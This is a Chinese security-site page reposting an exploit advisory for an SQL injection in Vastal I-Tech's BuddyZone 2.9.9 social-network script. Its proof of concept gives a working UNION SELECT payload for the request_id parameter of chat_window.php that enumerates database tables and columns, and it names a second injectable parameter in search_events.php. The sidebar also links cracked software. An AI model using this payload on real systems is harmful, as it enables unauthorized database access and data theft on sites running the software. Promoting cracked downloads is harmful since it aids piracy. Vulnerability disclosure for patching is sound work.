ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全文章 → buddyzone2.9.9版本 SQL注入漏洞【黑客web漏洞&网络安全漏洞】

buddyzone2.9.9版本 SQL注入漏洞【黑客web漏洞&网络安全漏洞】

时间:2018-01-29 15:41:39人气:作者:本站作者我要评论

buddyzone2.9.9版本 SQL注入漏洞【黑客web漏洞&网络安全漏洞】

公司简介:Vastal I-Tech成立于1999年,致力于为所有人提供高质量的软件和互联网服务。从那时起,我们为客户开发了许多定制软件。在过去的14年里,我们已经在超过7000多个网站上工作。我们的目标是在我们能够充分满足我们的客户时实现的。我们总是渴望得到一个新的挑战,以便我们能够进一步提高我们的技能,并为您提供最好的解决方案。我们的主要目标始终是与客户建立健康的关系,以便我们继续共同开展业务。 

buddyzone是Vastal的一款社交产品,属于收费型产品,产品价格 $ 39.99 

# # # # # 
# Exploit Title: Vastal I-Tech Facebook Clone 2.9.9 - SQL Injection
# Dork: N/A
# Date: 29.01.2018
# Vendor Homepage: http://vastal.com/
# Software Link: http://vastal.com/buddy-zone-social-networking-script.html
# Version: 2.9.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Cesafe
# Author Web: http://www.Cesafe.com
# # # # #
# Description:
# The vulnerability allows an users to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/chat_im/chat_window.php?request_id=[SQL]
# 
# -551++/*!13337UNION*/+/*!13337SELECT*/+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+-
# 
# http://localhost/[PATH]/search_events.php?category=[SQL]
# 

相关文章

猜你喜欢

  • Ougishi绿色版下载 V4.00 中文版

    2020-06-19 / 561k

  • 谷歌地图下载助手睿智版破解下载 V9.5绿色版

    2020-06-19 / 32.7M

  • OfficeFIX中文破解版V6.110 注册版

    2020-06-19 / 26.8M

  • Plotagraph破解版V1.2.0 免费版 32/64位

    2020-06-19 / 31.5M

  • IP查详细地址工具下载 V1.1 官方免费版

    2020-06-19 / 408K

  • 内存扫把中文版下载V1.97绿色版

    2020-06-19 / 1.3M

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网